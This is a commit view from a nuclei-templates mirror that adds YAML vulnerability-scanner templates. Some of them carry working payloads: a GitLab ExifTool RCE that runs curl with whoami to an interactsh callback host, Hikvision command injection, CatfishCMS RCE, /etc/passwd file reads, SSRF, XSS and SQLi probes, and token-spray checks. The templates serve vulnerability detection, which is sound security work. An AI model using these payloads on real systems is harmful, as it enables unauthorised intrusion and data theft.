daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #105 from projectdiscovery/master 

Updation
patch-1
Dhiyaneshwaran 2021-10-29 18:12:58 +05:30 committed by GitHub
parent e43354523c ba04bc0d3a
commit 80484df046
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
86 changed files with 2120 additions and 962 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

20
.github/workflows/template-validate.yml vendored
View File

@ -11,23 +11,19 @@ jobs:
with:
go-version: 1.17
#- name: Cache Go
# id: cache-go
# uses: actions/cache@v2
# with:
# path: /home/runner/go
# key: ${{ runner.os }}-go
- name: Cache Go
id: cache-go
uses: actions/cache@v2
with:
path: /home/runner/go
key: ${{ runner.os }}-go
- name: Installing Nuclei
# if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
if: steps.cache-go.outputs.cache-hit != 'true'
run: |
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev
shell: bash
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
- name: Template Validation
run: |
nuclei -validate -t .
nuclei -validate -w ./workflows
shell: bash

2
.github/workflows/templates-stats.yml vendored
View File

@ -1,13 +1,11 @@
name: 🗒 Templates Stats
on:
create:
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
if: ${{ startsWith(github.ref, 'refs/tags/v') }}
steps:
- uses: actions/checkout@master
- uses: actions/setup-go@v2

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 |
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 |
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 |
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 |
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | |
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | |
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | |
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | |
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
**176 directories, 2418 files**.
**178 directories, 2459 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1860
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 |
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 |
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 |
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 |
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | |
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | |
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | |
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | |
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | |
| cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
| lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
| panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
| xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
| wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
| exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
| rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
| tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
| wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 51 | | | | |

27
cnvd/CNVD-2019-06255.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'

32
cves/2015/CVE-2015-5471.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
reference:
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- http://www.vapid.dhs.org/advisory.php?v=134
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
tags: cve,cve2015,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2015-5471
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

37
cves/2016/CVE-2016-1000136.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2016-1000136
info:
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin heat-trackr v1.0
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000136
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

32
cves/2017/CVE-2017-0929.yaml Normal file
View File

@ -0,0 +1,32 @@
id: CVE-2017-0929
info:
name: DotNetNuke ImageHandler SSRF
author: charanrayudu,meme-lord
severity: high
description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
reference:
- https://hackerone.com/reports/482634
- https://nvd.nist.gov/vuln/detail/CVE-2017-0929
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2017-0929
cwe-id: CWE-918
tags: cve,cve2017,oast,ssrf,dnn
requests:
- method: GET
path:
- '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 500

1
cves/2018/CVE-2018-9845.yaml
View File

@ -4,6 +4,7 @@ info:
name: Etherpad Lite before 1.6.4 is exploitable for admin access.
author: philippedelteil
severity: critical
description: Etherpad Lite before 1.6.4 is exploitable for admin access.
reference:
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b

2
cves/2020/CVE-2020-28208.yaml
View File

@ -6,7 +6,7 @@ info:
severity: medium
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
reference: https://trovent.io/security-advisory-2010-01
tags: cve,cve2020,rockethchat
tags: cve,cve2020,rocketchat
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30

63
cves/2021/CVE-2021-22205.yaml Normal file
View File

@ -0,0 +1,63 @@
id: CVE-2021-22205
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
tags: cve,cve2021,gitlab,rce,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'

49
cves/2021/CVE-2021-36260.yaml Normal file
View File

@ -0,0 +1,49 @@
id: CVE-2021-36260
info:
name: Hikvision IP camera/NVR - Unauthenticated RCE
author: pdteam,gy741
severity: critical
description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
reference:
- https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
- https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
- https://nvd.nist.gov/vuln/detail/CVE-2021-36260
- https://github.com/Aiminsun/CVE-2021-36260
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-36260
cwe-id: CWE-77,CWE-20
metadata:
shodan-query: http.favicon.hash:999357577
tags: cve,cve2021,hikvision,rce,iot,intrusive
requests:
- raw:
- |
PUT /SDK/webLanguage HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
- |
GET /x HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"

35
cves/2021/CVE-2021-36749.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2021-36749
info:
name: Apache Druid Authentication Restrictions Bypass
author: _0xf4n9x_
severity: medium
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
- https://www.cvedetails.com/cve/CVE-2021-36749/
- https://github.com/BrucessKING/CVE-2021-36749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 6.5
cve-id: CVE-2021-36749
cwe-id: CWE-668
tags: cve,cve2021,apache,lfi,auth-bypass
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "druid:*:1000:1000:"
condition: or

69
cves/2021/CVE-2021-42258.yaml Normal file
View File

@ -0,0 +1,69 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
author: dwisiswant0
severity: critical
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-42258
cwe-id: CWE-89
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
- type: xpath
name: VS
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATE']"
- type: xpath
name: VSG
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
- type: xpath
name: EV
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
matchers:
- type: word
part: body
condition: and
words:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"

39
cves/2021/CVE-2021-42565.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2021-42565
info:
author: madrobot
name: myfactory FMS - Reflected XSS
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-42565
cwe-id: CWE-79
tags: cve,cve2021,myfactory,xss
requests:
- method: GET
path:
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
condition: and
- type: word
part: header
words:
- "text/html"

39
cves/2021/CVE-2021-42566.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2021-42566
info:
name: myfactory FMS - Reflected XSS
author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-42566
cwe-id: CWE-79
tags: cve,cve2021,myfactory,xss
requests:
- method: GET
path:
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
condition: and
- type: word
part: header
words:
- "text/html"

7
dns/cname-service-detection.yaml
View File

@ -11,7 +11,7 @@ dns:
type: CNAME
class: inet
recursion: true
retries: 5
retries: 3
matchers-condition: or
matchers:
@ -29,3 +29,8 @@ dns:
name: announcekit
words:
- "cname.announcekit.app"
- type: word
name: wix
words:
- "wixdns.net"

24
exposed-panels/openemr-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: openemr-detect
info:
name: OpenEMR Product Detect
author: pussycat0x
severity: info
metadata:
shodan-dork: 'app="OpenEMR"'
tags: panel,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/interface/login/login.php?site=default"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"title":"OpenEMR Product Registration"'
- type: status
status:
- 200

8
exposed-panels/pulse-secure-panel.yaml
View File

@ -10,14 +10,18 @@ requests:
- method: GET
path:
- "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
- "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi"
- "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
part: header
words:
- "/dana-na/auth/welcome.cgi"
part: header
- type: regex
part: body
regex:
- "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css"
part: body

22
exposed-panels/redis-commander-exposure.yaml Normal file
View File

@ -0,0 +1,22 @@
id: redis-commander-exposure
info:
name: Redis Commander Exposure
author: dahse89
severity: low
reference:
- https://joeferner.github.io/redis-commander/
- https://github.com/joeferner/redis-commander
tags: panel,redis
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
condition: and
words:
- "<title>Redis Commander"
- "redisCommanderBearerToken"

24
exposed-panels/securityspy-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: securityspy-detect
info:
name: SecuritySpy Camera Detect
author: pussycat0x
severity: medium
metadata:
shodan-dork: 'title:SecuritySpy'
tags: unauth,iot,securityspy,panel,camera
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>SecuritySpy</title>'
part: body
- type: status
status:
- 200

26
exposed-panels/sugarcrm-panel.yaml Normal file
View File

@ -0,0 +1,26 @@
id: sugarcrm-panel
info:
name: Detect SugarCRM Panel
author: johnk3r
severity: info
reference: https://www.shodan.io/search?query=sugarcrm
tags: sugarcrm,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/index.php?action=Login&module=Users"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SugarCRM</title>"
- type: status
status:
- 200

31
exposures/files/dwsync-exposure.yaml Normal file
View File

@ -0,0 +1,31 @@
id: dwsync-exposure
info:
name: Dwsync.xml Exposure
author: KaizenSecurity
severity: info
description: The dwsync.xml file is a file generated by Dreamweaver. Where the file contains information related to what files are in the website directory.
tags: dwsync,exposure,dreamweaver
requests:
- method: GET
path:
- "{{BaseURL}}/_notes/dwsync.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- application/xml
- type: word
part: body
words:
- '<dwsync>'
- '</dwsync>'
condition: and

27
exposures/files/idea-folder-exposure.yaml Normal file
View File

@ -0,0 +1,27 @@
id: idea-folder-exposure
info:
name: Public .idea Folder containing files with sensitive data
author: martincodes-de
severity: info
description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data.
tags: phpstorm,jetbrains,idea,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.idea/deployment.xml"
- "{{BaseURL}}/.idea/workspace.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?xml version="
- "<project version"
part: body
condition: and

26
exposures/logs/idea-logs-exposure.yaml Normal file
View File

@ -0,0 +1,26 @@
id: idea-logs-exposure
info:
name: Public .idea Folder containing http logs
author: martincodes-de
severity: info
description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file
tags: phpstorm,jetbrains,idea,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.idea/httpRequests/http-requests-log.http"
- "{{BaseURL}}/.idea/httpRequests/http-client.cookies"
matchers-condition: or
matchers:
- type: regex
regex:
- '(?m)^(GET|POST) https?:\/\/'
part: body
- type: word
words:
- "# domain path name value date"
part: body

50
file/python/python-scanner.yaml Normal file
View File

@ -0,0 +1,50 @@
id: python-scanner
info:
name: Python Scanner
author: majidmc2
severity: info
description: Indicators for dangerous Python functions
reference:
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
tags: python,file,sast
file:
- extensions:
- py
extractors:
- type: regex
name: code-injection
regex:
- 'exec'
- 'eval'
- '__import__'
- type: regex
name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
- 'os.popen'
- type: regex
name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- type: regex
name: dangerous-yaml
regex:
- 'yaml.load'
- type: regex
name: sqli
regex:
- 'cursor.execute'

1
misconfiguration/application-yaml.yaml
View File

@ -5,6 +5,7 @@ info:
author: Cristi vlad (@cristivlad25)
severity: info
description: Finds Application YAML files which often contain sensitive information.
tags: misconfig
requests:
- method: GET

25
takeovers/wix-takeover.yaml Normal file
View File

@ -0,0 +1,25 @@
id: wix-takeover
info:
author: harshinsecurity,philippedelteil
description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over.
severity: high
tags: takeover,wix
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
condition: or
words:
- 'Error ConnectYourDomain occurred'
- 'wixErrorPagesApp'
- type: status
status:
- 404

22
technologies/aws/aws-cloudfront-service.yaml Normal file
View File

@ -0,0 +1,22 @@
id: aws-cloudfront-service
info:
name: AWS Cloudfront service detection
author: jiheon-dev
severity: info
tags: aws,tech
description: Detect websites using AWS cloudfront service
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
condition: or
dsl:
- "contains(tolower(all_headers), 'x-cache: hit from cloudfront')"
- "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')"
- "contains(tolower(all_headers), 'x-cache: miss from cloudfront')"
- "contains(tolower(all_headers), 'x-cache: error from cloudfront')"

25
technologies/hikvision-detection.yaml Normal file
View File

@ -0,0 +1,25 @@
id: hikvision-detection
info:
name: Hikvision Detection
author: pdteam
severity: info
tags: tech,hikvision
requests:
- method: GET
path:
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/doc/page/login.asp"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "Hikvision Digital Technology"
- type: dsl
name: favicon
dsl:
- "status_code==200 && ('999357577' == mmh3(base64_py(body)))"

0
technologies/ibm-http-server.yaml → technologies/ibm/ibm-http-server.yaml
View File

24
technologies/ibm/ibm-sterling-detect.yaml Normal file
View File

@ -0,0 +1,24 @@
id: ibm-sterling-detect
info:
name: IBM Sterling File Gateway Detect
author: princechaddha
severity: info
tags: tech,sterling,ibm
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Welcome to IBM Sterling File Gateway"
- type: status
status:
- 200

23
token-spray/api-adafruit-io.yaml Normal file
View File

@ -0,0 +1,23 @@
id: api-adafruit-io
info:
name: Adafruit IO API Test
author: dwisiswant0
severity: info
reference: https://io.adafruit.com/api/docs/
tags: token-spray,adafruit
self-contained: true
requests:
- method: GET
path:
- "https://io.adafruit.com/api/v2/user"
headers:
X-AIO-Key: "{{token}}"
matchers:
- type: word
part: body
words:
- "error"
negative: true

24
token-spray/api-appveyor.yaml Normal file
View File

@ -0,0 +1,24 @@
id: api-appveyor
info:
name: AppVeyor API Test
author: dwisiswant0
severity: info
reference: https://www.appveyor.com/docs/api/
tags: token-spray,appveyor
self-contained: true
requests:
- method: GET
path:
- "https://ci.appveyor.com/api/roles"
headers:
Content-Type: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "Authorization required"
negative: true

25
token-spray/api-binance.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-binance
info:
name: Binance REST API
author: geeknik
severity: info
reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md
tags: token-spray,binance
self-contained: true
requests:
- method: GET
path:
- "https://api.binance.com/api/v3/historicalTrades"
headers:
X-MBX-APIKEY: "{{token}}"
matchers:
- type: word
part: body
words:
- "Invalid API-key"
- "key format invalid"
condition: or
negative: true

19
token-spray/api-cooperhewitt.yaml Normal file
View File

@ -0,0 +1,19 @@
id: api-cooperhewitt
info:
name: Cooper Hewitt API
author: daffainfo
severity: info
reference: https://collection.cooperhewitt.org/api/methods/
tags: token-spray,cooperhewitt
self-contained: true
requests:
- method: GET
path:
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
matchers:
- type: status
status:
- 200

26
token-spray/api-dbt.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-dbt
info:
name: dbt Cloud API Test
author: dwisiswant0
severity: info
reference: https://docs.getdbt.com/docs/introduction
tags: token-spray,dbt
self-contained: true
requests:
- method: GET
path:
- "https://cloud.getdbt.com/api/v2/accounts/"
headers:
Content-Type: application/json
Authorization: Token {{token}}
matchers:
- type: word
part: body
words:
- "Invalid token"
- "Authentication credentials were not provided."
condition: or
negative: true

25
token-spray/api-leanix.yaml Normal file
View File

@ -0,0 +1,25 @@
id: api-leanix
